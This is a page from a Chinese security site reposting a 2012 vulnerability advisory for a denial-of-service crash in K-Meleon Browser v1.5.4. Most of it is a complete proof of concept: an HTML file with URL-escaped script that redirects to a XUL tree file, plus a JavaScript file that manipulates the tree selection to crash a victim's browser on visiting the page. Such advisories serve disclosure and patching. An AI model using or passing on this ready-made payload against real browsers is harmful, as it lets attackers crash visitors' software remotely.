首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
K-Meleon Browser v1.5.4 - Denial of Service Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2012-04-17  
Title:
======
K-Meleon Browser v1.5.4 - Denial of Service Vulnerability

Introduction:
=============
K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko
layout engine developed by Mozilla which is also used by Firefox. K-Meleon is Free, Open
Source software released under the GNU General Public License and is designed specifically
for Microsoft Windows operating systems.

(Copy of the Vendor Homepage: http://kmeleon.sourceforge.net )


Abstract:
=========
Vulnerability Laboratory Research Team discovered a remote Dangle pointer (Denial of Service) Vulnerability on K-Meleon

Browser v1.5.4.

Details:
========
A denial of service vulnerability is detected on K-Meleon Browser v1.5.4 . The vulnerability allows
an attacker to form manipulated files to crash th victims browser stable when processing to request.
The null pointer dos vulnerability is located nsTreeSelection element. Successful exploitation results
in a stable (bex exception) application (StackHash_2c85) crash.

Vulnerable Module(s):
[+] nsTreeSelection element

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers. Victim only need to visit the
malicious file (frame-class.html) to crash stable. For demonstration or reproduce ...

frame-class.html
<script language=JavaScript>m='%3Chtml%3E%0A%3Capplet%20code%3D%22hexHEX.class%22%20width
%3D100%20height%3D140%3E%3C/applet%3E%0A%3Cscript%3Edocument.location%3D%22tree.xul%22%3C/
script%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


tree.xul
<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/javascript"?>
<window
id="poc-test"
title="TESTING EXPLOIT"
orient="vertical"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"; onload="doSelect()">
<script src="rem0ve.js"/>
<tree id="penetrationtest" rows="1" onselect="doSelect()">
<treechildren>
<treeitem container="true" open="true">
<treerow>
<treecell label="rem0ve () vulnerability-lab com"/>
</treerow>
</treeitem>
</treechildren>
</tree>
</window>



rem0ve.js
function Init()
{
var tree=document.getElementById('penetrationtest');
tree.view.selection.select(0);
doSelect();
}
function doSelect()
{
var tree=document.getElementById('penetrationtest');
var sel = tree.view.selection;
sel.tree = { invalidateRange: function(v,l)
{
sel.clearSelection();
}
}
}
setTimeout("Init()",500);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·V-CMS PHP File Upload and Exec
·Microsoft IIS 7.5 remote heap
·Quest InTrust Annotation Objec
·CyberLink Power2Go name attrib
·wicd Local Privilege Esclation
·GSM SIM Editor 5.15 Buffer Ove
·Backtrack 5 R2 wicd Privilege
·Office 2008 sp0 RTF Pfragments
·Mozilla Firefox Bootstrapped A
·MS11-046 Proof Of Concept
·Local buffer overflow (.m3u ,
·OpenSSL ASN1 BIO Memory Corrup
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved